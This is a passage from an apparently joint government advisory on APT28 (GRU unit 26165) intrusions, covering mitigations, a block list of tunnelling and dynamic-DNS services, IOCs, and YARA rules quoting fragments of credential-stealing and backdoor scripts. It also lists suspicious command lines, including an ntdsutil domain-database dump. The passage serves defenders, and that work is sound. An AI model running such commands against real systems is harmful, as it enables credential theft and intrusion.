Percentage of Total Attempts Ukraine 81.0% Romania 9.9% Poland 4.0% Hungary 2.8% Slovakia 1.7% Others 0.6% Mitigation Actions General Security Mitigations Architecture and Configuration Employ appropriate network segmentation [D3-NI] and restrictions to limit access and utilize additional attributes (such as device information, environment, and access path) when making access decisions [D3-AMED]. Consider Zero Trust principles when designing systems. Base product choices on how those products can solve specific risks identified as part of the end-to-end design. [9] Ensure that host firewalls and network security appliances (e.g., firewalls) are configured to only allow legitimately needed data flows between devices and servers to prevent lateral movement [D3-ITF]. Alert on attempts to connect laterally between host devices or other unusual data flows. Use automated tools to audit access logs for security concerns and identify anomalous access requests [D3-RAPA]. For organizations using on-premises authentication and email services, block and alert on NTLM/SMB requests to external infrastructure [D3-OTF]. Utilize endpoint, detection, and response (EDR) and other cybersecurity solutions on all systems, prioritizing high value systems with large amounts of sensitive data such as mail servers and domain controllers [D3-PM] first. Perform threat and attack modeling to understand how sensitive systems may be compromised within an organization’s specific architecture and security controls. Use this to develop a monitoring strategy to detect compromise attempts and select appropriate products to enact this strategy. Collect and monitor Windows logs for certain events, especially for events that indicate that a log was cleared unexpectedly [D3-SFA]. Enable optional security features in Windows to harden endpoints and mitigate initial access techniques [D3-AH]: Enable attack surface reduction rules to prevent executable content from email [D3-ABPI]. Enable attack surface reduction rules to prevent execution of files from globally writeable directories, such as Downloads or %APPDATA% [D3-EAL]. Unless users are involved in the development of scripts, limit the local execution of scripts (such as batch scripts, VBScript, JScript/JavaScript, and PowerShell [10]) to known scripts [D3-EI], and audit execution attempts. Disable Windows Host Scripting functionality and configure PowerShell to run in Constrained mode [D3-ACH]. Where feasible, implement allowlisting for applications and scripts to limit execution to only those needed for authorized activities, blocking all others by default [D3-EAL]. Consider using open source SIGMA rules as a baseline for detecting and alerting on suspicious file execution or command parameters [D3-PSA]. Use services that provide enhanced browsing services and safe link checking [D3-URA]. Significant reductions in successful spearphishing attempts were noted when email providers began offering link checking and automatic file detonation to block malicious content. Where possible, block logins from public VPNs, including exit nodes in the same country as target systems, or, if they need to be allowed, alert on them for further investigation. Most organizations should not need to allow incoming traffic, especially logins to systems, from VPN services [D3-NAM]. Educate users to only use approved corporate systems for relevant government and military business and avoid the use of personal accounts on cloud email providers to conduct official business. Network administrators should also audit both email and web request logs to detect such activity. Many organizations may not need to allow outgoing traffic to hosting and API mocking services, which are frequently used by GRU unit 26165. Organizations should consider alerting on or blocking the following services, with exceptions allowlisted for legitimate activity [D3-DNSDL]. *.000[.]pe *.1cooldns[.]com *.42web[.]io *.4cloud[.]click *.accesscan[.]org *.bumbleshrimp[.]com *.camdvr[.]org *.casacam[.]net *.ddnsfree[.]com *.ddnsgeek[.]com *.ddnsguru[.]com *.dynuddns[.]com *.dynuddns[.]net *.free[.]nf *.freeddns[.]org *.frge[.]io *.glize[.]com *.great-site[.]net *.infinityfreeapp[.]com *.kesug[.]com *.loseyourip[.]com *.lovestoblog[.]com *.mockbin[.]io *.mockbin[.]org *.mocky[.]io *.mybiolink[.]io *.mysynology[.]net *.mywire[.]org *.ngrok[.]io *.ooguy[.]com *.pipedream[.]net *.rf[.]gd *.urlbae[.]com *.webhook[.]site *.webhookapp[.]com *.webredirect[.]org *.wuaze[.]com Heuristic detections for web requests to new subdomains, including of the above providers, may uncover malicious phishing activity [D3-DNRA]. Logging the requests for each sub-domain requested by users on a network, such as in DNS or firewall logs, may enable system administrators to identify new targeting and victims. Identity and Access Management Organizations should take measures to ensure strong access controls and mitigate against common credential theft techniques: Use MFA with strong factors, such as passkeys or PKI smartcards, and require regular re-authentication [D3-MFA]. [11], [12] Strong authentication factors are not guessable using dictionary techniques, so they resist brute force attempts. Implement other mitigations for privileged accounts: including limiting the number of admin accounts, considering using hardware MFA tokens, and regularly reviewing all privileged user accounts [D3-JFAPA]. Separate privileged accounts by role and alert on misuse of privileged accounts [D3-UAP]. For example, email administrator accounts should be different from domain administrator accounts. Reduce reliance on passwords; instead, consider using services like single sign-on [D3-TBA]. For organizations using on-premises authentication and email services, plan to disable NTLM entirely and migrate to more robust authentication processes such as PKI certificate authentication. Do not store passwords in Group Policy Preferences (GPP). Remove all passwords previously included in GPP and change all passwords on the corresponding accounts [D3-CH]. [13] Use account throttling or account lockout [D3-ANET]: Throttling is preferred to lockout. Throttling progressively increases time delay between successive login attempts. Account lockout can leave legitimate users unable to access their accounts and requires access to an account recovery process. Account lockout can provide a malicious actor with an easy way to launch a Denial of Service (DoS). If using lockout, then allowing 5 to 10 attempts before lockout is recommended. Use a service to check for compromised passwords before using them [D3-SPP]. For example, “Have I Been Pwned” can be used to check whether a password has been previously compromised without disclosing the potential password. Change all default credentials [D3-CRO] and disable protocols that use weak authentication (e.g., clear-text passwords or outdated and vulnerable authentication or encryption protocols) or do not support multi-factor authentication [D3-ACH] [D3-ET]. Always configure access controls carefully to ensure that only well-maintained and well-authenticated accounts have access. [13] IP Camera Mitigations The following mitigation techniques for IP cameras can be used to defend against this type of malicious activity: Ensure IP cameras are currently supported. Replace devices that are out of support. Apply security patches and firmware updates to all IP cameras [D3-SU]. Disable remote access to the IP camera, if unnecessary [D3-ITF]. Ensure cameras are protected by a security appliance, if possible, such as by using a firewall to prevent communication with the camera from IP addresses not on an allowlist [D3-NAM]. If remote access to IP camera feeds is required, ensure authentication is enabled [D3-AA] and use a VPN to connect remotely [D3-ET]. Use MFA for management accounts if supported [D3-MFA]. Disable Universal Plug and Play (UPnP), Peer-to-Peer (P2P), and Anonymous Visit features on IP cameras and routers [D3-NI]. Turn off other ports/services not in use (e.g., FTP, web interface, etc.) [D3-ACH]. If supported, enable authenticated RTSP access only [D3-AA]. Review all authentication activity for remote access to make sure it is valid and expected [D3-UBA]. Investigate any unexpected or unusual activity. Audit IP camera user accounts to ensure they are an accurate reflection of your organization and that they are being used as expected [D3-UAP]. Configure, tune, and monitor logging—if available—on the IP camera. Indicators of Compromise (IOCs) Note: Specific IoCs may no longer be actor controlled, may themselves be compromised infrastructure or email accounts, or may be shared infrastructure such as public VPN or Tor exit nodes. Care should be taken when basing triaging logs or developing detection rules on these indicators. GRU unit 26165 almost certainly uses extensive further infrastructure and TTPs not specifically listed in this report. Utilities and scripts Legitimate utilities Unauthorized or unusual use of the following legitimate utilities can be an indication of a potential compromise: ntdsutil – A legitimate Windows executable used by threat actors to export contents of Active Directory wevtutil – A legitimate Windows executable used by threat actors to delete event logs vssadmin – A legitimate Windows executable possibly used by threat actors to make a copy of the server’s C: drive ADexplorer – A legitimate window executable to view, edit, and backup Active Directory Certificate Services OpenSSH – The Windows version of a legitimate open source SSH client schtasks – A legitimate Windows executable used to create persistence using scheduled tasks whoami – A legitimate Windows executable used to retrieve the name of the current user tasklist – A legitimate Windows executable used to retrieve the list of running processes hostname – A legitimate Windows executable used to retrieve the device name arp – A legitimate Windows executable used to retrieve the ARP table for mapping the network environment systeminfo – A legitimate Windows executable used to retrieve a comprehensive summary of device and operating system information net – A legitimate Windows executable used to retrieve detailed user information wmic – A legitimate Windows executable used to interact with Windows Management Instrumentation (WMI), such as to retrieve letters assigned to logical partitions on storage drives cacls – A legitimate Windows executable used to modify permissions on files icacls – A legitimate Windows executable used to modify permissions to files and handle integrity levels and ownership ssh – A legitimate Windows executable used to establish network shell connections reg – A legitimate Windows executable used to add to or modify the system registry Note: Additional heuristics are needed for effective hunting for these and other living off the land (LOTL) binaries to avoid being overwhelmed by false positives if these legitimate management tools are used regularly. See the joint guide, Identifying and Mitigating Living Off the Land Techniques, for guidance on developing a multifaceted cybersecurity strategy that enables behavior analytics, anomaly detection, and proactive hunting, which are part of a comprehensive approach to mitigating cyber threats that employ LOTL techniques. Malicious scripts Certipy – An open source python tool for enumerating and abusing Active Directory Certificate Services Get-GPPPassword.py – An open source python script for finding insecure passwords stored in Group Policy Preferences ldap-dump.py – A script for enumerating user accounts and other information in Active Directory Hikvision backdoor string: “YWRtaW46MTEK” Suspicious command lines While the following utilities are legitimate, and using them with the command lines shown may also be legitimate, these command lines are often used during malicious activities and could be an indication of a compromise: edge.exe “-headless-new -disable-gpu” ntdsutil.exe "activate instance ntds" ifm "create full C:\temp\[a-z]{3}" quit quit ssh -Nf schtasks /create /xml Outlook CVE Exploitation IOCs md-shoeb@alfathdoor[.]com[.]sa jayam@wizzsolutions[.]com accounts@regencyservice[.]in m.salim@tsc-me[.]com vikram.anand@4ginfosource[.]com mdelafuente@ukwwfze[.]com sarah@cosmicgold469[.]co[.]za franch1.lanka@bplanka[.]com commerical@vanadrink[.]com maint@goldenloaduae[.]com karina@bhpcapital[.]com tv@coastalareabank[.]com ashoke.kumar@hbclife[.]in 213[.]32[.]252[.]221 124[.]168[.]91[.]178 194[.]126[.]178[.]8 159[.]196[.]128[.]120 Commonly Used Webmail Providers portugalmail[.]pt mail-online[.]dk email[.]cz seznam[.]cz Malicious Archive Filenames Involving CVE-2023-38831 calc.war.zip news_week_6.zip Roadmap.zip SEDE-PV-2023-10-09-1_EN.zip war.zip Zeyilname.zip Brute Forcing IP Addresses Disclaimer: These IP addresses date June 2024 through August 2024. The authoring agencies recommend organizations investigate or vet these IP addresses prior to taking action, such as blocking. June 2024 July 2024 August 2024 192[.]162[.]174[.]94 207[.]244[.]71[.]84 31[.]135[.]199[.]145 79[.]184[.]25[.]198 91[.]149[.]253[.]204 103[.]97[.]203[.]29 162[.]210[.]194[.]2 31[.]42[.]4[.]138 79[.]185[.]5[.]142 91[.]149[.]254[.]75 209[.]14[.]71[.]127 46[.]112[.]70[.]252 83[.]10[.]46[.]174 91[.]149[.]255[.]122 109[.]95[.]151[.]207 46[.]248[.]185[.]236 83[.]168[.]66[.]145 91[.]149[.]255[.]19 64[.]176[.]67[.]117 83[.]168[.]78[.]27 91[.]149[.]255[.]195 64[.]176[.]69[.]196 83[.]168[.]78[.]31 91[.]221[.]88[.]76 64[.]176[.]70[.]18 83[.]168[.]78[.]55 93[.]105[.]185[.]139 64[.]176[.]70[.]238 83[.]23[.]130[.]49 95[.]215[.]76[.]209 64[.]176[.]71[.]201 83[.]29[.]138[.]115 138[.]199[.]59[.]43 70[.]34[.]242[.]220 89[.]64[.]70[.]69 147[.]135[.]209[.]245 70[.]34[.]243[.]226 90[.]156[.]4[.]204 178[.]235[.]191[.]182 70[.]34[.]244[.]100 91[.]149[.]202[.]215 178[.]37[.]97[.]243 70[.]34[.]245[.]215 91[.]149[.]203[.]73 185[.]234[.]235[.]69 70[.]34[.]252[.]168 91[.]149[.]219[.]158 192[.]162[.]174[.]67 70[.]34[.]252[.]186 91[.]149[.]219[.]23 194[.]187[.]180[.]20 70[.]34[.]252[.]222 91[.]149[.]223[.]130 212[.]127[.]78[.]170 70[.]34[.]253[.]13 91[.]149[.]253[.]118 213[.]134[.]184[.]167 70[.]34[.]253[.]247 91[.]149[.]253[.]198 70[.]34[.]254[.]245 91[.]149[.]253[.]20 Detections Customized NTLM listener rule APT28_NTLM_LISTENER { meta: description = "Detects NTLM listeners including APT28's custom one" strings: $command_1 = "start-process powershell.exe -WindowStyle hidden" $command_2 = "New-Object System.Net.HttpListener" $command_3 = "Prefixes.Add('http://localhost:8080/')" $command_4 = "-match 'Authorization'" $command_5 = "GetValues('Authorization')" $command_6 = "Request.RemoteEndPoint.Address.IPAddressToString" $command_7 = "@(0x4e,0x54,0x4c,0x4d, 0x53,0x53,0x50,0x00,0x02,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x28,0x00,0x00,0x01,0x82,0x00,0x00,0x11,0x22,0x33,0x44,0x55,0x66,0x77,0x88,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)" $command_8 = ".AllKeys" $variable_1 = "$NTLMAuthentication" nocase $variable_2 = "$NTLMType2" nocase $variable_3 = "$listener" nocase $variable_4 = "$hostip" nocase $variable_5 = "$request" nocase $variable_6 = "$ntlmt2" nocase $variable_7 = "$NTLMType2Response" nocase $variable_8 = "$buffer" nocase condition: 5 of ($command_*) or all of ($variable_*) } HEADLACE shortcut rule APT28_HEADLACE_SHORTCUT { meta: description = "Detects the HEADLACE backdoor shortcut dropper. Rule is meant for threat hunting." strings: $type = "[InternetShortcut]" ascii nocase $url = "file://" $edge = "msedge.exe" $icon = "IconFile" condition: all of them } HEADLACE credential dialogbox phishing rule APT28_HEADLACE_CREDENTIALDIALOG { meta: description = "Detects scripts used by APT28 to lure user into entering credentials" strings: $command_1 = "while($true)" $command_2 = "Get-Credential $(whoami)" $command_3 = "Add-Content" $command_4 = ".UserName" $command_5 = ".GetNetworkCredential().Password" $command_6 = "GetNetworkCredential().Password.Length -ne 0" condition: 5 of them } HEADLACE core script rule APT28_HEADLACE_CORE { meta: description = "Detects HEADLACE core batch scripts" strings: $chcp = "chcp 65001" ascii $headless = "start \"\" msedge --headless=new --disable-gpu" ascii $command_1 = "taskkill /im msedge.exe /f" ascii $command_2 = "whoami>\"%programdata%" ascii $command_3 = "timeout" ascii $command_4 = "copy \"%programdata%\\" ascii $non_generic_del_1 = "del /q /f \"%programdata%" ascii $non_generic_del_3 = "del /q /f \"%userprofile%\\Downloads\\" ascii $generic_del = "del /q /f" ascii condition: ( $chcp and $headless ) and ( 1 of ($non_generic_del_*) or ($generic_del) or 3 of ($command_*) ) } MASEPIE rule APT28_MASEPIE { meta: description = "Detects MASEPIE python script" strings: $masepie_unique_1 = "os.popen('whoami').read()" $masepie_unique_2 = "elif message == 'check'" $masepie_unique_3 = "elif message == 'send_file':" $masepie_unique_4 = "elif message == 'get_file'" $masepie_unique_5 = "enc_mes('ok'" $masepie_unique_6 = "Bad command!'.encode('ascii'" $masepie_unique_7 = "{user}{SEPARATOR}{k}" $masepie_unique_8 = "raise Exception(\"Reconnect" condition: 3 of ($masepie_unique_*) } STEELHOOK rule APT28_STEELHOOK { meta: description = "Detects APT28's STEELHOOK powershell script" strings: $s_1 = "$($env:LOCALAPPDATA\\\\Google\\\\Chrome\\\\User Data\\\\Local State)" $s_2 = "$($env:LOCALAPPDATA\\\\Google\\\\Chrome\\\\User Data\\\\Default\\\\Login Data)" $s_3 = "$($env:LOCALAPPDATA\\\\Microsoft\\\\Edge\\\\User Data\\\\Local State)" $s_4 = "$($env:LOCALAPPDATA\\\\Microsoft\\\\Edge\\\\User Data\\\\Default\\\\Login Data)" $s_5 = "os_crypt.encrypted_key" $s_6 = "System.Security.Cryptography.DataProtectionScope" $s_7 = "[system.security.cryptography.protectdata]::Unprotect" $s_8 = "Invoke-RestMethod" condition: all of them } PSEXEC rule GENERIC_PSEXEC { meta: description = "Detects SysInternals PSEXEC executable" strings: $sysinternals_1 = "SYSINTERNALS SOFTWARE LICENCE TERMS" $sysinternals_2 = "/accepteula" $sysinternals_3 = "Software\\Sysinternals" $network_1 = "\\\\%s\\IPC$" $network_2 = "\\\\%s\\ADMIN$\\%s" $network_3 = "\\Device\\LanmanRedirector\\%s\\ipc$" $psexec_1 = "PSEXESVC" $psexec_2 = "PSEXEC-{}-" $psexec_3 = "Copying %s to %s..." $psexec_4 = "gPSINFSVC" condition: ( ( uint16( 0x0 ) ==0x5a4d ) and ( uint16( uint32( 0x3c )) == 0x4550 ) ) and filesize < 1024KB and ( ( any of ($sysinternals_*) and any of ($psexec_*) ) or ( 2 of ($network_*) and 2 of ($psexec_*)) ) } Cybersecurity Industry Tracking The cybersecurity industry provides overlapping cyber threat intelligence, IOCs, and mitigation recommendations related to GRU unit 26165 cyber actors. While not all encompassing, the following are the most notable threat group names related under MITRE ATT&CK G0007 and commonly used within the cybersecurity community: APT28 [14] Fancy Bear [14] Forest Blizzard [14] Blue Delta [15] Note: Cybersecurity companies have different methods of tracking and attributing cyber actors, and this may not be a 1:1 correlation to the U.S. government’s understanding for all activity related to these groupings. Further Reference To search for the presence of malicious email messages targeting CVE-2023-23397, network defenders may consider using the script published by Microsoft: https://aka.ms/CVE-2023-23397ScriptDoc. For the Impacket TTP, network defenders may consider using the following publicly available Impacket YARA detection rule: https://github.com/Neo23x0/signature-base/blob/master/yara/gen_impacket_tools.yar Works Cited [1] Microsoft. Defending Ukraine: Early Lessons from the Cyber War. 2022. https://blogs.microsoft.com/on-the-issues/2022/06/22/defending-ukraine-early-lessons-from-the-cyber-war/ [2] FBI et al. Russian Cyber Actors Use Compromised Routers to Facilitate Cyber Operations. 2024. https://media.defense.gov/2024/Feb/27/2003400753/-1/-1/0/CSA-Russian-Actors-Use-Routers-Facilitate-Cyber_Operations.PDF [3] NSA et al. Russian GRU Conducting Global Brute Force Campaign to Compromise Enterprise and Cloud Environments. 2021. https://media.defense.gov/2021/Jul/01/2002753896/-1/-1/0/CSA_GRU_GLOBAL_BRUTE_FORCE_CAMPAIGN_UOO158036-21.PDF [4] ANSSI. Campagnes d'attaques du mode opératoire APT28 depuis 2021. 2023. https://cert.ssi.gouv.fr/cti/CERTFR-2023-CTI-009/ [5] ANSSI. Targeting and compromise of french entities using the APT28 intrusion set. 2025. https://cert.ssi.gouv.fr/cti/CERTFR-2025-CTI-007/ [6] Polish Cyber Command. Detecting Malicious Activity Against Microsoft Exchange Servers. 2023. https://www.wojsko-polskie.pl/woc/articles/aktualnosci-w/detecting-malicious-activity-against-microsoft-exchange-servers/ [7] IBM. Israel-Hamas Conflict Lures to Deliver Headlace Malware. 2023. https://securityintelligence.com/x-force/itg05-ops-leverage-israel-hamas-conflict-lures-to-deliver-headlace-malware/ [8] CERT-UA. APT28: From Initial Attack to Creating Domain Controller Threats in an Hour. 2023. https://cert.gov.ua/article/6276894 [9] NSA. Embracing a Zero Trust Security Model. 2021. https://media.defense.gov/2021/Feb/25/2002588479/-1/-1/0/CSI_EMBRACING_ZT_SECURITY_MODEL_UOO115131-21.PDF [10] NSA et al. Keeping PowerShell: Security Measures to Use and Embrace. 2022. https://media.defense.gov/2022/Jun/22/2003021689/-1/-1/0/CSI_KEEPING_POWERSHELL_SECURITY_MEASURES_TO_USE_AND_EMBRACE_20220622.PDF [11] National Institute of Standards and Technology (NIST). Special Publication 800-63B: Digital Identity Guidelines – Authentication and Lifecycle Management. 2020. https://pages.nist.gov/800-63-3/sp800-63b.html [12] NSA. Selecting Secure Multi-factor Authentication Solutions. October 16, 2020. https://media.defense.gov/2024/Jul/31/2003515137/-1/-1/0/MULTIFACTOR_AUTHENTICATION_SOLUTIONS_UOO17091520.PDF [13] NSA and CSA. NSA and CISA Red and Blue Teams Share Top Ten Cybersecurity Misconfigurations. 2023. https://media.defense.gov/2023/Oct/05/2003314578/-1/-1/0/JOINT_CSA_TOP_TEN_MISCONFIGURATIONS_TLP-CLEAR.PDF [14] Department of Justice. Justice Department Conducts Court-Authorized Disruption of Botnet Controlled by the Russian Federation’s Main Intelligence Directorate of the General Staff (GRU). 2024. https://www.justice.gov/archives/opa/pr/justice-department-conducts-court-authorized-disruption-botnet-controlled-russian [15] Recorded Future. GRU’s BlueDelta Targets Key Networks in Europe with Multi-Phase Espionage Campaigns. 2024. https://go.recordedfuture.com/hubfs/reports/CTA-RU-2024-0530.pdf Disclaimer of endorsement The information and opinions contained in this document are provided "as is" and without any warranties or guarantees. Reference herein to any specific commercial products, process, or service by trade name, trademark, manufacturer, or otherwise, does not constitute or imply its endorsement, recommendation, or favoring by the United States Government, and this guidance shall not be used for advertising or product endorsement purposes. Purpose This document was developed in furtherance of the authoring agencies’ cybersecurity missions, including their responsibilities to identify and disseminate threats and to develop and issue cybersecurity specifications and mitigations. This information may be shared broadly to reach all appropriate stakeholders. Contact United States organizations National Security Agency (NSA) Cybersecurity Report Feedback: CybersecurityReports@nsa.gov Defense Industrial Base Inquiries and Cybersecurity Services: DIB_Defense@cyber.nsa.gov Media Inquiries / Press Desk: NSA Media Relations: 443-634-0721, MediaRelations@nsa.gov Cybersecurity and Infrastructure Security Agency (CISA) and Federal Bureau of Investigation (FBI) U.S. organizations are encouraged to reporting suspicious or criminal activity related to information in this advisory to CISA via the agency’s Incident Reporting System, its 24/7 Operations Center (report@cisa.gov or 1-844-Say-CISA), or your local FBI field office. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment user for the activity; the name of the submitting company or organization; and a designated point of contact. Department of Defense Cyber Crime Center (DC3) Defense Industrial Base Inquiries and Cybersecurity Services: DC3.DCISE@us.af.mil Media Inquiries / Press Desk: DC3.Information@us.af.mil United Kingdom organizations Report significant cyber security incidents to ncsc.gov.uk/report-an-incident (monitored 24/7) Germany organizations Bundesnachrichtendienst (BND): Media Relations / Press Desk: +49 30 20 45 36 30, pressestelle@bnd.bund.de BfV Prevention/Economic Protection Unit: +49 30 18792-3322, wirtschaftsschutz@bfv.bund.de BSI Service-Center: +49 800 274 1000, service-center@bsi.bund.de Czech Republic organizations Security Information Service (BIS): cyber.threats@bis.cz National Cyber and Information Security Agency (NÚKIB): cert.incident@nukib.gov.cz Poland organizations Poland Military Counterintelligence Service (SKW): cyber.int@skw.gov.pl Australian organizations Visit cyber.gov.au or call 1300 292 371 (1300 CYBER 1) to report cybersecurity incidents and access alerts and advisories. Canadian organizations Report incidents by emailing CCCS at contact@cyber.gc.ca. Estonia organizations Estonian Foreign Intelligence Service (EFIS): info@valisluureamet.ee Estonian National Cyber Security Centre (NCSC-EE): ria@ria.ee French organizations French organizations are encouraged to report suspicious activity or incident related to information found in this advisory by contacting ANSSI/CERT-FR by email at cert-fr@ssi.gouv.fr or by phone at: 3218 or +33 9 70 83 32 18. Appendix A: MITRE ATT&CK tactics and techniques See Table 2 through Table 14 for all the threat actor tactics and techniques referenced in this advisory. Table 2: Reconnaissance Tactic/Technique Title ID Use Reconnaissance TA0043 Conducted reconnaissance on at least one entity involved in the production of ICS components for railway management. Gather Victim Identity Information: Email Addresses T1589.002 Conducted contact information reconnaissance to identify additional targets in key positions. Gather Victim Org Information T1591 Conducted reconnaissance of the cybersecurity department. Gather Victim Org Information: Identify Roles T1591.004 Conducted reconnaissance of individuals responsible for coordinating transport. Gather Victim Org Information: Business Relationships T1591.002 Conducted reconnaissance of other companies cooperating with the victim entity. Gather Victim Host Information T1592 Attempted to enumerate Real Time Streaming Protocol (RTSP) servers hosting IP cameras. Table 3: Resource development Tactic/Technique Title ID Use Compromise Accounts: Email Accounts T1586.002 Sent phishing emails using compromised accounts. Compromise Accounts: Cloud Accounts T1586.003 Sent phishing emails using compromised accounts. Table 4: Initial Access Tactic/Technique Title ID Use Trusted Relationship T1199 Conducted follow-on targeting of additional entities in the transportation sector that had business ties to the primary target, exploiting trust relationships to attempt to gain additional access. Phishing T1566 Used spearphishing for credentials and delivering malware to gain initial access to targeted entities. Phishing: Spearphishing Attachment T1566.001 Sent emails with malicious attachments. Phishing: Spearphishing Link T1566.002 Used spearphishing with included links to fake login pages. Sent emails with embedded hyperlinks that downloaded a malicious archive. Phishing: Spearphishing Voice T1566.004 Attempted to use voice phishing to gain access to privileged accounts by impersonating IT staff. External Remote Services T1133 Exploited Internet-facing infrastructure, including corporate VPNs, to gain initial access to targeted entities. Exploit Public-Facing Application T1190 Exploited public vulnerabilities and SQL injection to gain initial access to targeted entities. Content Injection T1659 Leveraged a WinRAR vulnerability allowing for the execution of arbitrary code embedded in an archive. Table 5: Execution Tactic/Technique Title ID Use User Execution: Malicious Link T1204.001 Used malicious links to hosted shortcuts in spearphishing. User Execution: Malicious File T1204.002 Delivered malware executables via spearphishing. Scheduled Task/Job: Scheduled Task T1053.005 Used scheduled tasks to establish persistence. Command and Scripting Interpreter T1059 Delivered scripts in spearphishing. Executed arbitrary shell commands. Command and Scripting Interpreter: PowerShell T1059.001 PowerShell commands were often used to prepare data for exfiltration. Command and Scripting Interpreter: Windows Command Shell T1059.003 Used BAT script in spearphishing. Command and Scripting Interpreter: Visual Basic T1059.005 Used VBScript in spearphishing. Command and Scripting Interpreter: Python T1059.006 Installed python on infected machines to enable the execution of Certipy. Table 6: Persistence Tactic/Technique Title ID Use Account Manipulation: Additional Email Delegate Permissions T1098.002 Used manipulation of mailbox permissions to establish sustained email collection. Modify Authentication Process: Multi-Factor Authentication T1556.006 Enrolled compromised accounts in MFA mechanisms to increase the trust-level of compromised accounts and enable sustained access. Hijack Execution Flow: DLL Search Order Hijacking T1574.001 Used DLL search order hijacking to facilitate malware execution. Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder T1547.001 Used run keys to establish persistence. Boot or Logon Autostart Execution: Shortcut Modification T1547.009 Placed malicious shortcuts in the startup folder to establish persistence. Table 7: Defense Evasion Tactic/Technique Title ID Use Indicator Removal: Clear Windows Event Logs T1070.001 Deleted event logs through the wevtutil utility. Table 8: Credential access Tactic/Technique Title ID Use Brute Force T1110 Sent requests with Base64-encoded credentials for the RTSP server, which included publicly documented default credentials, and likely were generic attempts to brute force access to the devices. Brute Force: Password Guessing T1110.001 Used credential guessing to gain initial access to targeted entities. Brute Force: Password Spraying T1110.003 Used brute force to gain initial access to targeted entities. Conducted a brute force password spray via LDAP. Multi-Factor Authentication Interception T1111 Used multi-stage redirectors to provide MFA relaying capabilities in some campaigns. Input Capture T1056 Used multi-stage redirectors to provide CAPTCHA relaying capabilities in some campaigns. Forced Authentication T1187 Used an Outlook NTLM vulnerability to collect NTLM hashes and credentials via specially crafted Outlook calendar appointment invitations. OS Credential Dumping: NTDS T1003.003 Attempted to dump Active Directory NTDS.dit domain databases. Unsecured Credentials: Group Policy Preferences T1552.006 Retrieved plaintext passwords via Group Policy Preferences using Get-GPPPassword.py. Table 9: Discovery Tactic/Technique Title ID Use Account Discovery: Domain Account T1087.002 Used a modified ldap-dump.py to enumerate the Windows environment. Table 10: Command and Control Tactic/Technique Title ID Use Hide Infrastructure T1665 Abused SOHO devices to facilitate covert cyber operations, as well as proxy malicious activity, via devices with geolocation in proximity to the target. Proxy: External Proxy T1090.002 Actor-controlled servers sent RTSP DESCRIBE requests destined for RTSP servers. Proxy: Multi-hop Proxy T1090.003 Used Tor and commercial VPNs as part of their anonymization infrastructure Encrypted Channel T1573 Connected to victim infrastructure using encrypted TLS. Multi-Stage Channels T1104 Used multi-stage redirectors for campaigns. Table 11: Defense evasion (mobile framework) Tactic/Technique Title ID Use Execution Guardrails T1627 Used multi-stage redirectors to verify browser fingerprints in some campaigns. Execution Guardrails: Geofencing T1627.001 Used multi-stage redirectors to verify IP-geolocation in some campaigns. Table 12: Lateral movement Tactic/Technique Title ID Use Lateral Movement TA0008 Used native commands and open source tools, such as Impacket and PsExec, to move laterally within the environment. Remote Services: Remote Desktop Protocol T1021.001 Moved laterally within the network using RDP. Table 13: Collection Tactic/Technique Title ID Use Email Collection T1114 Retrieved sensitive data from email servers. Email Collection: Remote Email Collection T1114.002 Used server data exchange protocols and APIs such as Exchange Web Services (EWS) and IMAP to exfiltrate data from email servers. Automated Collection T1119 Used periodic EWS queries to collect new emails. Video Capture T1125 Attempted to gain access to the cameras’ feeds. Archive Collected Data T1560 Accessed files were archived in .zip files prior to exfiltration. Archive Collected Data: Archive via Utility T1560.001 Prepared zip archives for upload to the actors’ infrastructure. Table 14: Exfiltration Tactic/Technique Title ID Use Exfiltration Over Alternative Protocol T1048 Attempted to exfiltrate archived data via a previously dropped OpenSSH binary. Scheduled Transfer T1029 Used periodic EWS queries to collect new emails sent and received since the last data exfiltration. Appendix B: CVEs exploited Table 15: Exploited CVE information CVE Vendor/Product Details CVE-2023-38831 RARLAB WinRAR Allows execution of arbitrary code when a user attempts to view a benign file within a ZIP archive. CVE-2023-23397 Microsoft Outlook External actors could send specially crafted emails that cause a connection from the victim to an untrusted location of the actor’s control, leaking the Net-NTLMv2 hash of the victim that the actor could then relay to another service to authenticate as the victim. CVE-2021-44026 Roundcube Webmail Roundcube before 1.3.17 and 1.4.x before 1.4.12 is prone to a potential SQL injection via search or search params. CVE-2020-35730 Roundcube Webmail An XSS issue was discovered in Roundcube Webmail before 1.2.13, 1.3.x before 1.3.16 and 1.4.x before 1.4.10, where a plaintext email message with JavaScript in a link reference element is mishandled by linkref_addindex in rcube_string_replacer.php. CVE-2020-12641 Roundcube Webmail Roundcube Webmail before 1.4.4 allows arbitrary code execution via shell metacharacters in a configuration setting for im_convert_path or im_identify_path in rcube_image.php. Appendix C: MITRE D3FEND Countermeasures Table 16: MITRE D3FEND countermeasures Countermeasure Title ID Details Network Isolation D3-NI Employ appropriate network segmentation. Disable Universal Plug and Play (UPnP), Peer-to-Peer (P2P), and Anonymous Visit features on IP cameras and routers. Access Mediation D3-AMED Limit access and utilize additional attributes (such as device information, environment, and access path) when making access decisions. Configure access controls carefully to ensure that only well-maintained and well-authenticated accounts have access. Inbound Traffic Filtering D3-ITF Implement host firewall rules to block connections from other devices on the network, other than from authorized management devices and servers, to prevent lateral movement. Resource Access Pattern Analysis D3-RAPA Use automated tools to audit access logs for security concerns and identify anomalous access requests. Outbound Traffic Filtering D3-OTF Block NTLM/SMB requests to external infrastructure. Platform Monitoring D3-PM Install EDR/logging/cybersecurity solutions onto high value systems with large amounts of sensitive data such as mail servers and domain controllers. System File Analysis D3-SFA Collect and monitor Windows logs for certain events, especially for events that indicate that a log was cleared unexpectedly. Application Hardening D3-AH Enable optional security features in Windows to harden endpoints and mitigate initial access techniques. Application-based Process Isolation D3-ABPI Enable attack surface reduction rules to prevent executable content from email. Executable Allowlisting D3-EAL Enable attack surface reduction rules to prevent execution of files from globally writeable directories, such as Downloads or %APPDATA%. Execution Isolation D3-EI Unless users are involved in the development of scripts, limit the execution of scripts (such as batch, JavaScript, and PowerShell) to known scripts. Application Configuration Hardening D3-ACH Disable Windows Host Scripting functionality and configure PowerShell to run in Constrained mode. Disable protocols that use weak authentication (e.g., clear-text passwords, or outdated and vulnerable authentication or encryption protocols) or do not support multi-factor authentication. Turn off other ports/services not in use (e.g., FTP, web interface, etc.). Process Spawn Analysis D3-PSA Use open source SIGMA rules as a baseline for detecting and alerting on suspicious file execution or command parameters. URL 